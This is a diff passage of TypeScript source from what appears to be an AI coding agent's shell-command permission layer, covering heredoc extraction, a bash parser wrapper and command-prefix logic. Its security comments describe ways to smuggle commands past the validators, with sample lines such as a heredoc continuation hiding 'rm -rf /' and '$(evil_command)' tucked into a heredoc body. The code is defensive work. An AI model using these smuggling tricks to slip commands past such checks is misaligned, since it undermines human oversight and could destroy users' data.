k++ // skip escaped char inside double quotes
|
||||
continue
|
||||
}
|
||||
if (ch === '"') inDoubleQuote = false
|
||||
continue
|
||||
}
|
||||
// Unquoted context
|
||||
if (ch === '\n') {
|
||||
firstNewlineOffset = k - operatorEndIndex
|
||||
break
|
||||
}
|
||||
// Count backslashes for escape detection in unquoted context
|
||||
let backslashCount = 0
|
||||
for (let j = k - 1; j >= operatorEndIndex && command[j] === '\\'; j--) {
|
||||
backslashCount++
|
||||
}
|
||||
if (backslashCount % 2 === 1) continue // escaped char
|
||||
if (ch === "'") inSingleQuote = true
|
||||
else if (ch === '"') inDoubleQuote = true
|
||||
}
|
||||
// If we ended while still inside a quote, the logical line never ends —
|
||||
// there is no heredoc body. Leave firstNewlineOffset as -1 (handled below).
|
||||
}
|
||||
|
||||
// If no unquoted newline found, this heredoc has no content - skip it
|
||||
if (firstNewlineOffset === -1) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Security: Check for backslash-newline continuation at the end of the
|
||||
// same-line content (text between the operator and the newline). In bash,
|
||||
// `\<newline>` joins lines BEFORE heredoc parsing — so:
|
||||
// cat <<'EOF' && \
|
||||
// rm -rf /
|
||||
// content
|
||||
// EOF
|
||||
// bash joins to `cat <<'EOF' && rm -rf /` (rm is part of the command line),
|
||||
// then heredoc body = `content`. Our extractor runs BEFORE continuation
|
||||
// joining (commands.ts:82), so it would put `rm -rf /` in the heredoc body,
|
||||
// hiding it from all validators. Bail if same-line content ends with an
|
||||
// odd number of backslashes.
|
||||
const sameLineContent = command.slice(
|
||||
operatorEndIndex,
|
||||
operatorEndIndex + firstNewlineOffset,
|
||||
)
|
||||
let trailingBackslashes = 0
|
||||
for (let j = sameLineContent.length - 1; j >= 0; j--) {
|
||||
if (sameLineContent[j] === '\\') {
|
||||
trailingBackslashes++
|
||||
} else {
|
||||
break
|
||||
}
|
||||
}
|
||||
if (trailingBackslashes % 2 === 1) {
|
||||
// Odd number of trailing backslashes → last one escapes the newline
|
||||
// → this is a line continuation. Our heredoc-before-continuation order
|
||||
// would misparse this. Bail out.
|
||||
continue
|
||||
}
|
||||
|
||||
const contentStartIndex = operatorEndIndex + firstNewlineOffset
|
||||
const afterNewline = command.slice(contentStartIndex + 1) // +1 to skip the newline itself
|
||||
const contentLines = afterNewline.split('\n')
|
||||
|
||||
// Find the closing delimiter - must be on its own line
|
||||
// Security: Must match bash's exact behavior to prevent parsing discrepancies
|
||||
// that could allow command smuggling past permission checks.
|
||||
let closingLineIndex = -1
|
||||
for (let i = 0; i < contentLines.length; i++) {
|
||||
const line = contentLines[i]!
|
||||
|
||||
if (isDash) {
|
||||
// <<- strips leading TABS only (not spaces), per POSIX/bash spec.
|
||||
// The line after stripping leading tabs must be exactly the delimiter.
|
||||
const stripped = line.replace(/^\t*/, '')
|
||||
if (stripped === delimiter) {
|
||||
closingLineIndex = i
|
||||
break
|
||||
}
|
||||
} else {
|
||||
// << requires the closing delimiter to be exactly alone on the line
|
||||
// with NO leading or trailing whitespace. This matches bash behavior.
|
||||
if (line === delimiter) {
|
||||
closingLineIndex = i
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
// Security: Check for PST_EOFTOKEN-like early closure (make_cmd.c:606).
|
||||
// Inside $(), ${}, or backtick substitution, bash closes a heredoc when
|
||||
// a line STARTS with the delimiter and contains the shell_eof_token
|
||||
// (`)`, `}`, or backtick) anywhere after it. Our parser only does exact
|
||||
// line matching, so this discrepancy could hide smuggled commands.
|
||||
//
|
||||
// Paranoid extension: also bail on bash metacharacters (|, &, ;, (, <,
|
||||
// >) after the delimiter, which could indicate command syntax from a
|
||||
// parsing discrepancy we haven't identified.
|
||||
//
|
||||
// For <<- heredocs, bash strips leading tabs before this check.
|
||||
const eofCheckLine = isDash ? line.replace(/^\t*/, '') : line
|
||||
if (
|
||||
eofCheckLine.length > delimiter.length &&
|
||||
eofCheckLine.startsWith(delimiter)
|
||||
) {
|
||||
const charAfterDelimiter = eofCheckLine[delimiter.length]!
|
||||
if (/^[)}`|&;(<>]$/.test(charAfterDelimiter)) {
|
||||
// Shell metacharacter or substitution closer after delimiter —
|
||||
// bash may close the heredoc early here. Bail out.
|
||||
closingLineIndex = -1
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Security: If quotedOnly mode is set and this is an unquoted heredoc,
|
||||
// record its content range for nesting checks but do NOT add it to
|
||||
// heredocMatches. This ensures quoted "heredocs" inside its body are
|
||||
// correctly rejected by the insideSkipped check on subsequent iterations.
|
||||
//
|
||||
// CRITICAL: We do this BEFORE the closingLineIndex === -1 check. If the
|
||||
// unquoted heredoc has no closing delimiter, bash still treats everything
|
||||
// to end-of-input as the heredoc body (and expands $() within it). We
|
||||
// must block extraction of any subsequent quoted "heredoc" that falls
|
||||
// inside that unbounded body.
|
||||
if (options?.quotedOnly && !isQuotedOrEscaped) {
|
||||
let skipContentEndIndex: number
|
||||
if (closingLineIndex === -1) {
|
||||
// No closing delimiter — in bash, heredoc body extends to end of
|
||||
// input. Track the entire remaining range as "skipped body".
|
||||
skipContentEndIndex = command.length
|
||||
} else {
|
||||
const skipLinesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
|
||||
const skipContentLength = skipLinesUpToClosing.join('\n').length
|
||||
skipContentEndIndex = contentStartIndex + 1 + skipContentLength
|
||||
}
|
||||
skippedHeredocRanges.push({
|
||||
contentStartIndex,
|
||||
contentEndIndex: skipContentEndIndex,
|
||||
})
|
||||
continue
|
||||
}
|
||||
|
||||
// If no closing delimiter found, this is malformed - skip it
|
||||
if (closingLineIndex === -1) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Calculate end position: contentStartIndex + 1 (newline) + length of lines up to and including closing delimiter
|
||||
const linesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
|
||||
const contentLength = linesUpToClosing.join('\n').length
|
||||
const contentEndIndex = contentStartIndex + 1 + contentLength
|
||||
|
||||
// Security: Bail if this heredoc's content range OVERLAPS with any
|
||||
// previously-skipped heredoc's content range. This catches the case where
|
||||
// two heredocs share a command line (`cat <<EOF <<'SAFE'`) and the first
|
||||
// is unquoted (skipped in quotedOnly mode). In bash, when multiple heredocs
|
||||
// share a line, their bodies appear SEQUENTIALLY (first's body, then
|
||||
// second's). Both compute contentStartIndex from the SAME newline, so the
|
||||
// second's body search walks through the first's body. For:
|
||||
// cat <<EOF <<'SAFE'
|
||||
// $(evil_command)
|
||||
// EOF
|
||||
// safe body
|
||||
// SAFE
|
||||
// ...the quoted <<'SAFE' would incorrectly extract lines 2-4 as its body,
|
||||
// swallowing `$(evil_command)` (which bash EXECUTES via the unquoted
|
||||
// <<EOF's expansion) into the placeholder, hiding it from validators.
|
||||
//
|
||||
// The insideSkipped check above doesn't catch this because the quoted
|
||||
// operator's startIndex is on the command line BEFORE contentStart.
|
||||
// The contentStartPositions dedup check below doesn't catch it because the
|
||||
// skipped heredoc is in skippedHeredocRanges, not topLevelHeredocs.
|
||||
let overlapsSkipped = false
|
||||
for (const skipped of skippedHeredocRanges) {
|
||||
// Ranges [a,b) and [c,d) overlap iff a < d && c < b
|
||||
if (
|
||||
contentStartIndex < skipped.contentEndIndex &&
|
||||
skipped.contentStartIndex < contentEndIndex
|
||||
) {
|
||||
overlapsSkipped = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if (overlapsSkipped) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Build fullText: operator + newline + content (normalized form for restoration)
|
||||
// This creates a clean heredoc that can be restored correctly
|
||||
const operatorText = command.slice(startIndex, operatorEndIndex)
|
||||
const contentText = command.slice(contentStartIndex, contentEndIndex)
|
||||
const fullText = operatorText + contentText
|
||||
|
||||
heredocMatches.push({
|
||||
fullText,
|
||||
delimiter,
|
||||
operatorStartIndex: startIndex,
|
||||
operatorEndIndex,
|
||||
contentStartIndex,
|
||||
contentEndIndex,
|
||||
})
|
||||
}
|
||||
|
||||
// If no valid heredocs found, return original
|
||||
if (heredocMatches.length === 0) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
|
||||
// Filter out nested heredocs - any heredoc whose operator starts inside
|
||||
// another heredoc's content range should be excluded.
|
||||
// This prevents corruption when heredoc content contains << patterns.
|
||||
const topLevelHeredocs = heredocMatches.filter((candidate, _i, all) => {
|
||||
// Check if this candidate's operator is inside any other heredoc's content
|
||||
for (const other of all) {
|
||||
if (candidate === other) continue
|
||||
// Check if candidate's operator starts within other's content range
|
||||
if (
|
||||
candidate.operatorStartIndex > other.contentStartIndex &&
|
||||
candidate.operatorStartIndex < other.contentEndIndex
|
||||
) {
|
||||
// This heredoc is nested inside another - filter it out
|
||||
return false
|
||||
}
|
||||
}
|
||||
return true
|
||||
})
|
||||
|
||||
// If filtering removed all heredocs, return original
|
||||
if (topLevelHeredocs.length === 0) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
|
||||
// Check for multiple heredocs sharing the same content start position
|
||||
// (i.e., on the same line). This causes index corruption during replacement
|
||||
// because indices are calculated on the original string but applied to
|
||||
// a progressively modified string. Return without extraction - the fallback
|
||||
// is safe (requires manual approval or fails parsing).
|
||||
const contentStartPositions = new Set(
|
||||
topLevelHeredocs.map(h => h.contentStartIndex),
|
||||
)
|
||||
if (contentStartPositions.size < topLevelHeredocs.length) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
|
||||
// Sort by content end position descending so we can replace from end to start
|
||||
// (this preserves indices for earlier replacements)
|
||||
topLevelHeredocs.sort((a, b) => b.contentEndIndex - a.contentEndIndex)
|
||||
|
||||
// Generate a unique salt for this extraction to prevent placeholder collisions
|
||||
// with literal "__HEREDOC_N__" text in commands
|
||||
const salt = generatePlaceholderSalt()
|
||||
|
||||
let processedCommand = command
|
||||
topLevelHeredocs.forEach((info, index) => {
|
||||
// Use reverse index since we sorted descending
|
||||
const placeholderIndex = topLevelHeredocs.length - 1 - index
|
||||
const placeholder = `${HEREDOC_PLACEHOLDER_PREFIX}${placeholderIndex}_${salt}${HEREDOC_PLACEHOLDER_SUFFIX}`
|
||||
|
||||
heredocs.set(placeholder, info)
|
||||
|
||||
// Replace heredoc with placeholder while preserving same-line content:
|
||||
// - Keep everything before the operator
|
||||
// - Replace operator with placeholder
|
||||
// - Keep content between operator and heredoc content (e.g., " && echo done")
|
||||
// - Remove the heredoc content (from newline through closing delimiter)
|
||||
// - Keep everything after the closing delimiter
|
||||
processedCommand =
|
||||
processedCommand.slice(0, info.operatorStartIndex) +
|
||||
placeholder +
|
||||
processedCommand.slice(info.operatorEndIndex, info.contentStartIndex) +
|
||||
processedCommand.slice(info.contentEndIndex)
|
||||
})
|
||||
|
||||
return { processedCommand, heredocs }
|
||||
}
|
||||
|
||||
/**
 * Restores heredoc placeholders back to their original content in a single string.
 * Internal helper used by restoreHeredocs.
 *
 * Every occurrence of each placeholder key found in `text` is replaced with
 * the `fullText` of the matching map entry.
 *
 * @param text - String that may contain heredoc placeholders
 * @param heredocs - Map from placeholder to the heredoc it stands for
 * @returns `text` with every placeholder expanded to its heredoc text
 */
function restoreHeredocsInString(
  text: string,
  heredocs: Map<string, HeredocInfo>,
): string {
  let result = text
  for (const [placeholder, info] of heredocs) {
    // Pass a replacer FUNCTION, not a replacement string. With a string,
    // replaceAll interprets `$$`, `$&`, `` $` `` and `$'` as special
    // replacement patterns, and heredoc bodies routinely contain `$`
    // sequences, so the restored text would be silently corrupted.
    result = result.replaceAll(placeholder, () => info.fullText)
  }
  return result
}
|
||||
|
||||
/**
 * Expands heredoc placeholders in every element of a string array.
 *
 * When the placeholder map is empty the input array itself is returned
 * (no copy is made); otherwise a new array is produced.
 *
 * @param parts - Array of strings that may contain heredoc placeholders
 * @param heredocs - The map of placeholders from `extractHeredocs`
 * @returns Array with placeholders replaced by original heredoc content
 */
export function restoreHeredocs(
  parts: string[],
  heredocs: Map<string, HeredocInfo>,
): string[] {
  const nothingToRestore = heredocs.size === 0
  return nothingToRestore
    ? parts
    : parts.map(segment => restoreHeredocsInString(segment, heredocs))
}
|
||||
|
||||
/**
 * Quick test for heredoc syntax in a command.
 *
 * Only checks whether HEREDOC_START_PATTERN matches somewhere in the
 * string; it does not validate that the heredoc is well-formed.
 *
 * @param command - The shell command string
 * @returns true if the command appears to contain heredoc syntax
 */
export function containsHeredoc(command: string): boolean {
  const looksLikeHeredoc = HEREDOC_START_PATTERN.test(command)
  return looksLikeHeredoc
}
|
||||
@@ -0,0 +1,230 @@
|
||||
import { feature } from 'bun:bundle'
|
||||
import { logEvent } from '../../services/analytics/index.js'
|
||||
import { logForDebugging } from '../debug.js'
|
||||
import {
|
||||
ensureParserInitialized,
|
||||
getParserModule,
|
||||
type TsNode,
|
||||
} from './bashParser.js'
|
||||
|
||||
export type Node = TsNode
|
||||
|
||||
export interface ParsedCommandData {
|
||||
rootNode: Node
|
||||
envVars: string[]
|
||||
commandNode: Node | null
|
||||
originalCommand: string
|
||||
}
|
||||
|
||||
// Commands whose string length exceeds this are rejected by parseCommand and
// parseCommandRaw without being parsed.
const MAX_COMMAND_LENGTH = 10000

// Names accepted as the head of a `declaration_command` node by
// extractCommandArguments.
const DECLARATION_COMMANDS = new Set([
  'export',
  'declare',
  'typeset',
  'readonly',
  'local',
  'unset',
  'unsetenv',
])

// Node types that extractCommandArguments collects as arguments.
const ARGUMENT_TYPES = new Set(['word', 'string', 'raw_string', 'number'])

// Node types at which extractCommandArguments stops collecting.
const SUBSTITUTION_TYPES = new Set([
  'command_substitution',
  'process_substitution',
])

// Node types that findCommandNode treats as a command.
const COMMAND_TYPES = new Set(['command', 'declaration_command'])
|
||||
|
||||
// Flipped to true the first time the load outcome is reported.
let logged = false

/**
 * Reports the tree-sitter load outcome at most once.
 *
 * The first call writes a debug line and emits a `tengu_tree_sitter_load`
 * event carrying `success`; every later call does nothing.
 *
 * @param success - Whether the parser module was available
 */
function logLoadOnce(success: boolean): void {
  if (!logged) {
    logged = true
    const message = success
      ? 'tree-sitter: native module loaded'
      : 'tree-sitter: unavailable'
    logForDebugging(message)
    logEvent('tengu_tree_sitter_load', { success })
  }
}
|
||||
|
||||
/**
 * Waits for parser initialisation (WASM init: Parser.init + Language.load).
 *
 * Call before parseCommand/parseCommandRaw so the parser is available.
 * Idempotent. Does nothing unless the TREE_SITTER_BASH or
 * TREE_SITTER_BASH_SHADOW feature is enabled.
 */
export async function ensureInitialized(): Promise<void> {
  // Keep the feature() calls directly in the condition so the bundler can
  // still eliminate the guarded branch.
  if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
    await ensureParserInitialized()
  }
}
|
||||
|
||||
/**
 * Parses a command and returns its root node, the first command node found
 * in it, and that command's leading variable assignments.
 *
 * Resolves to null when the command is empty or longer than
 * MAX_COMMAND_LENGTH, when the TREE_SITTER_BASH feature is off, when the
 * parser module is unavailable, when the parse yields no root node, or when
 * parsing/analysis throws.
 *
 * @param command - The shell command string
 * @returns Parsed data, or null as described above
 */
export async function parseCommand(
  command: string,
): Promise<ParsedCommandData | null> {
  const isEmpty = !command
  if (isEmpty || command.length > MAX_COMMAND_LENGTH) return null

  // Gate: ant-only until pentest. External builds fall back to legacy
  // regex/shell-quote path. Guarding the whole body inside the positive
  // branch lets Bun DCE the NAPI import AND keeps telemetry honest — we
  // only fire tengu_tree_sitter_load when a load was genuinely attempted.
  if (feature('TREE_SITTER_BASH')) {
    await ensureParserInitialized()
    const parserModule = getParserModule()
    logLoadOnce(parserModule !== null)

    if (parserModule) {
      try {
        const rootNode = parserModule.parse(command)
        if (rootNode) {
          const commandNode = findCommandNode(rootNode, null)
          return {
            rootNode,
            envVars: extractEnvVars(commandNode),
            commandNode,
            originalCommand: command,
          }
        }
      } catch {
        // Any failure while parsing or analysing is reported as "no result".
      }
    }
  }

  return null
}
|
||||
|
||||
/**
|
||||
* SECURITY: Sentinel for "parser was loaded and attempted, but aborted"
|
||||
* (timeout / node budget / Rust panic). Distinct from `null` (module not
|
||||
* loaded). Adversarial input can trigger abort under MAX_COMMAND_LENGTH:
|
||||
* `(( a[0][0]... ))` with ~2800 subscripts hits PARSE_TIMEOUT_MICROS.
|
||||
* Callers MUST treat this as fail-closed (too-complex), NOT route to legacy.
|
||||
*/
|
||||
export const PARSE_ABORTED = Symbol('parse-aborted')
|
||||
|
||||
/**
 * Raw parse — skips findCommandNode/extractEnvVars which the security
 * walker in ast.ts doesn't use. Saves one tree walk per bash command.
 *
 * Resolves to:
 *   - Node: parse succeeded
 *   - null: module not loaded / feature off / empty / over-length
 *   - PARSE_ABORTED: module loaded but parse failed (timeout/panic)
 *
 * @param command - The shell command string
 */
export async function parseCommandRaw(
  command: string,
): Promise<Node | null | typeof PARSE_ABORTED> {
  const isEmpty = !command
  if (isEmpty || command.length > MAX_COMMAND_LENGTH) return null

  if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
    await ensureParserInitialized()
    const parserModule = getParserModule()
    logLoadOnce(parserModule !== null)
    if (!parserModule) return null

    try {
      const tree = parserModule.parse(command)
      if (tree !== null) return tree

      // SECURITY: Module loaded; null here = timeout/node-budget abort in
      // bashParser.ts (PARSE_TIMEOUT_MS=50, MAX_NODES=50_000).
      // Previously collapsed into `return null` → parse-unavailable → legacy
      // path, which lacks EVAL_LIKE_BUILTINS — `trap`, `enable`, `hash` leaked.
      logEvent('tengu_tree_sitter_parse_abort', {
        cmdLength: command.length,
        panic: false,
      })
      return PARSE_ABORTED
    } catch {
      // The parser threw: report it as an abort flagged as a panic.
      logEvent('tengu_tree_sitter_parse_abort', {
        cmdLength: command.length,
        panic: true,
      })
      return PARSE_ABORTED
    }
  }

  return null
}
|
||||
|
||||
/**
 * Locates the first command node at or below `node`.
 *
 * - A node whose type is in COMMAND_TYPES is returned as-is.
 * - A `variable_assignment` with a parent resolves to the first command
 *   among the parent's children that starts after it (or null).
 * - A `redirected_statement` resolves to its first direct command child
 *   (or null); it is not searched any deeper.
 * - Anything else (including `pipeline`, whose first child may be a
 *   redirected_statement) is searched depth-first, child by child.
 *
 * @param node - Node to inspect
 * @param parent - Parent of `node`, or null at the root
 * @returns The command node, or null if none is found
 */
function findCommandNode(node: Node, parent: Node | null): Node | null {
  const { type, children } = node
  const isCommand = (candidate: Node): boolean =>
    COMMAND_TYPES.has(candidate.type)

  if (isCommand(node)) return node

  switch (type) {
    case 'variable_assignment':
      // Variable assignment followed by command
      if (parent) {
        const following = parent.children.find(
          sibling => isCommand(sibling) && sibling.startIndex > node.startIndex,
        )
        return following ?? null
      }
      break
    case 'redirected_statement':
      // Redirected statement: find the command inside
      return children.find(child => isCommand(child)) ?? null
  }

  // Recursive search (also covers pipelines)
  for (const child of children) {
    const found = findCommandNode(child, node)
    if (found) return found
  }
  return null
}
|
||||
|
||||
/**
 * Collects the text of the variable assignments that precede the command
 * name in a `command` node.
 *
 * Scanning stops at the first `command_name` or `word` child. Any node that
 * is missing or is not of type `command` yields an empty list.
 *
 * @param commandNode - Node returned by findCommandNode, possibly null
 * @returns Assignment texts in source order
 */
function extractEnvVars(commandNode: Node | null): string[] {
  if (!commandNode || commandNode.type !== 'command') return []

  const assignments: string[] = []
  for (const child of commandNode.children) {
    const kind = child.type
    if (kind === 'command_name' || kind === 'word') break
    if (kind === 'variable_assignment') assignments.push(child.text)
  }
  return assignments
}
|
||||
|
||||
/**
 * Flattens a command node into `[name, ...arguments]`.
 *
 * For a `declaration_command`, the result is just the first child's text
 * when it is one of DECLARATION_COMMANDS, otherwise an empty list.
 *
 * For other nodes, children are walked in order:
 * - variable assignments are skipped;
 * - a `command_name`, or the first `word` seen before any name, is pushed
 *   verbatim as the command name;
 * - children whose type is in ARGUMENT_TYPES are pushed with one layer of
 *   surrounding quotes stripped;
 * - the first child whose type is in SUBSTITUTION_TYPES ends the walk;
 * - any other child is ignored.
 *
 * @param commandNode - A command or declaration_command node
 * @returns Command name followed by its collected arguments
 */
export function extractCommandArguments(commandNode: Node): string[] {
  // Declaration commands
  if (commandNode.type === 'declaration_command') {
    const head = commandNode.children[0]
    if (head && DECLARATION_COMMANDS.has(head.text)) return [head.text]
    return []
  }

  const collected: string[] = []
  let sawCommandName = false

  for (const child of commandNode.children) {
    const kind = child.type
    if (kind === 'variable_assignment') continue

    // Command name
    const isName =
      kind === 'command_name' || (!sawCommandName && kind === 'word')
    if (isName) {
      sawCommandName = true
      collected.push(child.text)
      continue
    }

    // Arguments
    if (ARGUMENT_TYPES.has(kind)) {
      collected.push(stripQuotes(child.text))
      continue
    }
    if (SUBSTITUTION_TYPES.has(kind)) break
  }

  return collected
}
|
||||
|
||||
/**
 * Removes one layer of matching surrounding quotes.
 *
 * Text of at least two characters that both starts and ends with `"`, or
 * both starts and ends with `'`, loses its first and last character.
 * Anything else is returned unchanged.
 *
 * @param text - Raw node text
 * @returns Text without its enclosing quote pair, if it had one
 */
function stripQuotes(text: string): string {
  if (text.length < 2) return text
  for (const quote of ['"', "'"]) {
    if (text.startsWith(quote) && text.endsWith(quote)) {
      return text.slice(1, -1)
    }
  }
  return text
}
|
||||
@@ -0,0 +1,204 @@
|
||||
import { buildPrefix } from '../shell/specPrefix.js'
|
||||
import { splitCommand_DEPRECATED } from './commands.js'
|
||||
import { extractCommandArguments, parseCommand } from './parser.js'
|
||||
import { getCommandSpec } from './registry.js'
|
||||
|
||||
// Matches a string made up solely of decimal digits.
const NUMERIC = /^\d+$/
// Matches a string that begins with a `NAME=` assignment.
const ENV_VAR = /^[A-Za-z_][A-Za-z0-9_]*=/

// Wrapper commands with complex option handling that can't be expressed in specs
const WRAPPER_COMMANDS = new Set([
  'nice', // command position varies based on options
])

// Wraps a lone value in a one-element array; arrays are returned as-is.
const toArray = <T>(val: T | T[]): T[] => {
  if (Array.isArray(val)) return val
  return [val]
}
|
||||
|
||||
// Reports whether `arg` names one of the spec's subcommands. A subcommand's
// name may be a single string or a list of aliases. Used to disambiguate
// wrapper commands that also have subcommands (e.g. the git spec has
// isCommand args for aliases). A missing spec or an empty/missing subcommand
// list yields false.
function isKnownSubcommand(
  arg: string,
  spec: { subcommands?: { name: string | string[] }[] } | null,
): boolean {
  const subcommands = spec?.subcommands ?? []
  for (const { name } of subcommands) {
    const aliases = Array.isArray(name) ? name : [name]
    if (aliases.includes(arg)) return true
  }
  return false
}
|
||||
|
||||
/**
 * Computes a prefix for a single command, including any leading
 * variable assignments.
 *
 * Resolves to null when the recursion limits are exceeded (more than 2
 * wrappers or depth above 10), when the command cannot be parsed, or when a
 * top-level wrapper command produced a null prefix. Resolves to
 * `{ commandPrefix: null }` when no command node, command name, or prefix
 * could be determined.
 *
 * @param command - The shell command string
 * @param recursionDepth - Current recursion depth (callers normally omit)
 * @param wrapperCount - Number of wrappers already unwrapped
 */
export async function getCommandPrefixStatic(
  command: string,
  recursionDepth = 0,
  wrapperCount = 0,
): Promise<{ commandPrefix: string | null } | null> {
  const limitExceeded = wrapperCount > 2 || recursionDepth > 10
  if (limitExceeded) return null

  const parsed = await parseCommand(command)
  if (!parsed) return null

  const { envVars, commandNode } = parsed
  if (!commandNode) return { commandPrefix: null }

  const [cmd, ...args] = extractCommandArguments(commandNode)
  if (!cmd) return { commandPrefix: null }

  // A command is a wrapper if it is listed explicitly or its spec has an
  // argument flagged isCommand...
  const spec = await getCommandSpec(cmd)
  const looksLikeWrapper =
    WRAPPER_COMMANDS.has(cmd) ||
    (spec?.args && toArray(spec.args).some(arg => arg?.isCommand))

  // ...unless its first argument is one of its own known subcommands, in
  // which case it is treated as a regular command.
  const firstArg = args[0]
  const isWrapper =
    Boolean(looksLikeWrapper) &&
    !(firstArg && isKnownSubcommand(firstArg, spec))

  const prefix = isWrapper
    ? await handleWrapper(cmd, args, recursionDepth, wrapperCount)
    : await buildPrefix(cmd, args, spec)

  if (prefix === null && isWrapper && recursionDepth === 0) return null
  if (!prefix) return { commandPrefix: null }

  const envPrefix = envVars.length ? `${envVars.join(' ')} ` : ''
  return { commandPrefix: envPrefix + prefix }
}
|
||||
|
||||
/**
 * Builds the prefix for a wrapper command by recursing into the command it
 * wraps.
 *
 * Two strategies are tried in order:
 * 1. If the wrapper's spec marks an argument position as `isCommand` and
 *    that position exists in `args`, the prefix is the wrapper name, then
 *    the earlier arguments that are non-empty, not options and not `NAME=`
 *    assignments, then the prefix of the wrapped command starting there.
 * 2. Otherwise (or if strategy 1 yields no prefix), the wrapped command is
 *    taken to start at the first argument that is not an option, not purely
 *    numeric and not a `NAME=` assignment.
 *
 * @returns The combined prefix; the bare wrapper name when strategy 2 finds
 *   no candidate argument; or null when the wrapped command has no prefix.
 */
async function handleWrapper(
  command: string,
  args: string[],
  recursionDepth: number,
  wrapperCount: number,
): Promise<string | null> {
  // Prefix of the wrapped command that starts at args[startIndex].
  const recurseFrom = (startIndex: number) =>
    getCommandPrefixStatic(
      args.slice(startIndex).join(' '),
      recursionDepth + 1,
      wrapperCount + 1,
    )

  const spec = await getCommandSpec(command)
  const commandArgIndex = spec?.args
    ? toArray(spec.args).findIndex(arg => arg?.isCommand)
    : -1

  if (commandArgIndex !== -1 && commandArgIndex < args.length) {
    const leading = args
      .slice(0, commandArgIndex)
      .filter(arg => arg && !arg.startsWith('-') && !ENV_VAR.test(arg))
    const viaSpec = await recurseFrom(commandArgIndex)
    if (viaSpec?.commandPrefix) {
      return [command, ...leading, ...viaSpec.commandPrefix.split(' ')].join(
        ' ',
      )
    }
    // No usable prefix via the spec position: fall back to scanning below.
  }

  const wrappedIndex = args.findIndex(
    arg => !arg.startsWith('-') && !NUMERIC.test(arg) && !ENV_VAR.test(arg),
  )
  // An empty-string argument counts as "nothing wrapped", like no match.
  if (wrappedIndex === -1 || !args[wrappedIndex]) return command

  const viaScan = await recurseFrom(wrappedIndex)
  return viaScan?.commandPrefix ? `${command} ${viaScan.commandPrefix}` : null
}
|
||||
|
||||
/**
 * Computes prefixes for a compound command (with && / || / ;).
 *
 * A command that splits into at most one subcommand yields its own prefix
 * as a single-element array (or an empty array if it has none).
 *
 * Otherwise each subcommand is trimmed, optionally filtered out, and given
 * its own prefix. Prefixes sharing a root (first word) are then collapsed
 * via word-aligned longest common prefix, with roots kept in the order they
 * were first seen.
 *
 * @param command - The full shell command string
 * @param excludeSubcommand — optional filter; return true for subcommands
 *   that should be excluded from the prefix suggestion (e.g. read-only
 *   commands that are already auto-allowed).
 * @returns One collapsed prefix per distinct root command
 */
export async function getCompoundCommandPrefixesStatic(
  command: string,
  excludeSubcommand?: (subcommand: string) => boolean,
): Promise<string[]> {
  const subcommands = splitCommand_DEPRECATED(command)

  if (subcommands.length <= 1) {
    const single = (await getCommandPrefixStatic(command))?.commandPrefix
    return single ? [single] : []
  }

  // Bucket prefixes by root command as they are produced; a Map keeps the
  // roots in first-seen order.
  const byRoot = new Map<string, string[]>()
  for (const raw of subcommands) {
    const subcommand = raw.trim()
    if (excludeSubcommand?.(subcommand)) continue

    const prefix = (await getCommandPrefixStatic(subcommand))?.commandPrefix
    if (!prefix) continue

    const root = prefix.split(' ')[0]!
    const bucket = byRoot.get(root)
    if (bucket) {
      bucket.push(prefix)
    } else {
      byRoot.set(root, [prefix])
    }
  }

  // Collapse each bucket via word-aligned LCP
  return Array.from(byRoot.values(), group => longestCommonPrefix(group))
}
|
||||
|
||||
/**
 * Longest prefix shared by all strings, measured in whole space-separated
 * words. At least the first word of the first string is always kept.
 * e.g. ["git fetch", "git worktree"] → "git"
 *      ["npm run test", "npm run lint"] → "npm run"
 *
 * @param strings - Candidate strings; an empty list yields ''
 * @returns The shared word-aligned prefix
 */
function longestCommonPrefix(strings: string[]): string {
  const [first, ...rest] = strings
  if (first === undefined) return ''
  if (rest.length === 0) return first

  const words = first.split(' ')
  // Shrink the shared word count as each further string is compared.
  const sharedCount = rest.reduce((limit, other) => {
    const otherWords = other.split(' ')
    let matched = 0
    while (
      matched < limit &&
      matched < otherWords.length &&
      words[matched] === otherWords[matched]
    ) {
      matched++
    }
    return matched
  }, words.length)

  return words.slice(0, Math.max(1, sharedCount)).join(' ')
}
|
||||
@@ -0,0 +1,53 @@
|
||||
import { memoizeWithLRU } from '../memoize.js'
|
||||
import specs from './specs/index.js'
|
||||
|
||||
export type CommandSpec = {
|
||||
name: string
|
||||
description?: string
|
||||
subcommands?: CommandSpec[]
|
||||
args?: Argument | Argument[]
|
||||
options?: Option[]
|
||||
}
|
||||
|
||||
export type Argument = {
|
||||
name?: string
|
||||
description?: string
|
||||
isDangerous?: boolean
|
||||
isVariadic?: boolean // repeats infinitely e.g. echo hello world
|
||||
isOptional?: boolean
|
||||
isCommand?: boolean // wrapper commands e.g. timeout, sudo
|
||||
isModule?: string | boolean // for python -m and similar module args
|
||||
isScript?: boolean // script files e.g. node script.js
|
||||
}
|
||||
|
||||
export type Option = {
|
||||
name: string | string[]
|
||||
description?: string
|
||||
args?: Argument | Argument[]
|
||||
isRequired?: boolean
|
||||
}
|
||||
|
||||
/**
 * Dynamically imports the `@withfig/autocomplete` spec for a command.
 *
 * The name is rejected (null) without importing anything when it is empty,
 * contains `/`, `\` or `..`, or starts with `-` (a lone `-` is allowed).
 * A failed import also resolves to null.
 *
 * @param command - Command name used to build the module path
 * @returns The module's default export if truthy, otherwise the module
 *   itself; null when rejected or not loadable
 */
export async function loadFigSpec(
  command: string,
): Promise<CommandSpec | null> {
  const rejected =
    !command ||
    command.includes('/') ||
    command.includes('\\') ||
    command.includes('..') ||
    (command.startsWith('-') && command !== '-')
  if (rejected) return null

  try {
    const loaded = await import(`@withfig/autocomplete/build/${command}.js`)
    return loaded.default || loaded
  } catch {
    return null
  }
}
|
||||
// Resolves the spec for a command name: the bundled `specs` list is checked
// first, then loadFigSpec; null when neither has one. Wrapped in
